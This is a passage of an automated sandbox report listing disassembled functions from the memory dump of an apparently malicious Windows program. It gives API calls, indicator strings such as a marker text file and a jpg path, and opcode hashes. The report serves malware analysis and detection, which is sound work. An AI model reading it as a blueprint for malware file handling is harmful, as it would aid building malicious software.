                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: .\crypto\buffer\buffer.c$C7F
                    • API String ID: 2102423945-2013712220
                    • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                    • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                    • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                    • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                    Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: StringUuid$CreateFree
                    • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                    • API String ID: 3044360575-2335240114
                    • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                    • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                    • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                    • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                    Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Path$AppendFolder
                    • String ID: bowsakkdestx.txt
                    • API String ID: 29327785-2616962270
                    • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                    • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                    • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                    • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                    Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                    Download Yara Rule
                    APIs
                    • _malloc.LIBCMT ref: 00423B64
                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00770000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                    • std::exception::exception.LIBCMT ref: 00423B82
                    • __CxxThrowException@8.LIBCMT ref: 00423B97
                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                    • String ID: bad allocation
                    • API String ID: 3074076210-2104205924
                    • Opcode ID: 241cfa4299846a07ecc57268e606ba0db0d865f968b84549374c8695ce3f7968
                    • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                    • Opcode Fuzzy Hash: 241cfa4299846a07ecc57268e606ba0db0d865f968b84549374c8695ce3f7968
                    • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                    Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                    • RegisterClassExW.USER32(00000030), ref: 0041BA73
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: ClassCursorLoadRegister
                    • String ID: 0$LPCWSTRszWindowClass
                    • API String ID: 1693014935-1496217519
                    • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                    • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                    • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                    • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                    Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                    Download Yara Rule
                    APIs
                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                    • DeleteFileA.KERNEL32(?), ref: 0040C45B
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Path$AppendDeleteFileFolder
                    • String ID: bowsakkdestx.txt
                    • API String ID: 610490371-2616962270
                    • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                    • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                    • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                    • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                    Function 00419E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: p2Q
                    • API String ID: 2102423945-1521255505
                    • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                    • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                    • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                    • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                    Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove_strtok
                    • String ID:
                    • API String ID: 3446180046-0
                    • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                    • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                    • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                    • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                    Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                    • String ID:
                    • API String ID: 2974526305-0
                    • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                    • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                    • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                    • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                    Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                    • __isleadbyte_l.LIBCMT ref: 0043C6DB
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                    • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                    • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                    • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                    Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                    • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                    • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                    • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleWritelstrlen
                    • String ID:
                    • API String ID: 1421093161-0
                    • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                    • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                    • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                    • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                    Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 004C70AB
                      • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                      • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                    • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                    • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                    • CallCatchBlock.LIBCMT ref: 004C70F8
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                    • String ID:
                    • API String ID: 2901542994-0
                    • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                    • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                    • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                    • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                    Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                      • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                    • __calloc_crt.LIBCMT ref: 00425A01
                      • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                    • __lock.LIBCMT ref: 00425A37
                    • ___addlocaleref.LIBCMT ref: 00425A43
                    • __lock.LIBCMT ref: 00425A57
                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                    • String ID:
                    • API String ID: 2580527540-0
                    • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                    • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                    • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                    • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                    Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                    • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                    • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                    • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                    Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32 ref: 004127B9
                    • _malloc.LIBCMT ref: 004127C3
                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00770000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                    • _memset.LIBCMT ref: 004127CE
                    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                    • String ID:
                    • API String ID: 2824100046-0
                    • Opcode ID: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                    • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                    • Opcode Fuzzy Hash: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                    • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                    Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenA.KERNEL32 ref: 00412806
                    • _malloc.LIBCMT ref: 00412814
                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00770000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                    • _memset.LIBCMT ref: 0041281F
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                    • String ID:
                    • API String ID: 2824100046-0
                    • Opcode ID: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                    • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                    • Opcode Fuzzy Hash: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                    • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                    Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove
                    • String ID: invalid string position$string too long
                    • API String ID: 4104443479-4289949731
                    • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                    • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                    • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                    • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                    Function 00470040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: .\crypto\asn1\tasn_new.c
                    • API String ID: 2102423945-2878120539
                    • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                    • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                    • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                    • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                    Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove
                    • String ID: invalid string position$string too long
                    • API String ID: 4104443479-4289949731
                    • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                    • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                    • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                    • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                    Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                      • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                      • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                      • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                      • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                      • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                      • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                      • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                    • TranslateMessage.USER32(?), ref: 0041B4CD
                    • DispatchMessageW.USER32(?), ref: 0041B4D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                    • String ID: %username%$I:\5d2860c89d774.jpg
                    • API String ID: 441990211-897913220
